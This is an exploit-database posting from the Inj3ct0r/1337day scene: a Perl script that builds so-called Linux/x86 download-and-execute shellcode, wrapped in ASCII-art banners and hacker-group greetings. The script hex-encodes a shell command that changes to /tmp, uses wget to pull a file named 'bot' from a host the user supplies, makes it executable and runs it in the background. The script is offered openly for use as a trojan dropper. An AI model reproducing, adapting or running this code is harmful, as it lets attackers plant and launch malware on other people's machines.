44 bytes small Linux/x86 remote download and execute file shellcode.
c2ab73aea3bb05ad4186f5859cef4882d7fded0c371c68009d408c9df6e0ef6c
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm KedAns-Dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
#!/usr/bin/perl
sub logo(){
print q'
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
1 ______ 0
0 .-" "-. 1
1 / KedAns-Dz \ =-=-=-=-=-=-=-=-=-=-=-| 0
0 Algerian HaCker | | > Site : 1337day.com | 1
1 --------------- |, .-. .-. ,| > Twitter : @kedans | 0
0 | )(_o/ \o_)( | > ked-h@hotmail.com | 1
1 |/ /\ \| =-=-=-=-=-=-=-=-=-=-=| 0
0 (@_ (_ ^^ _) HaCkerS-StreeT-Team 1
1 _ ) \_______\__|IIIIII|__/_______________________ 0
0 (_)@8@8{}<________|-\IIIIII/-|________________________> 1
1 )_/ \ / 0
0 (@ `--------` © 2011, Inj3ct0r Team 1
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
0 Shellcode Linux/x86 Remote Download/Execute File - 44 Bytes + File 1
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
';
}
###
# Shellcode Linux/x86 Remote Download/Execute File - 44 Bytes + File
# Platform (Linux) - ARCH (x86) - Type (Shellcode)
# Tested on : Linux/x86 - Ubuntu - (10.10 & 8.14 'BT4')
# Provided By : KedAns-Dz
##
# Unreal IRCD 3.2.8.1 Remote Download/Execute
# Real Provider (anonymous) > http://exploit-db.com/exploits/13853
###
logo();
$ARGC=@ARGV;
if ($ARGC!=1) {
print "\n [!] Usage: $0 [Tr0j4n3-HoSt] \n";
die " [*] f.ex: $0 http://1337day.com/attack.txt \n";
}
my $FILE = shift;
my $leng = length($FILE)+44; # 44 - default length of shellcode
my $shellcode = # cd /tmp; wget [TroJ4n3-HoSt] -O bot; chmod +x bot; ./bot &
'\x63\x64\x20\x2f\x74\x6d\x70\x3b\x20\x77\x67\x65\x74\x20'.$FILE.
'\x20\x2d\x4f\x20\x62\x6f\x74\x3b\x20\x63\x68\x6d\x6f\x64\x20\x2b'.
'\x78\x20\x62\x6f\x74\x3b\x20\x2e\x2f\x62\x6f\x74\x20\x26';
print"\n\n [+] File : ".$FILE."\n [+] Length : ".$leng." Bytes\n [+] Shellcode :\n\n".$shellcode."\n";
#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix *
# gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n * ^Xecuti0N3r 'www.1337day.com/team' ++ ....
# Exploit-Id Team : jos_ali_joe + Caddy-Dz (exploit-id.com) ... All Others * TreX (hotturks.org)
# JaGo-Dz (sec4ever.com) * KelvinX (kelvinx.net) * PaCketStorm Team (www.packetstormsecurity.org)
# www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
#================================================================================================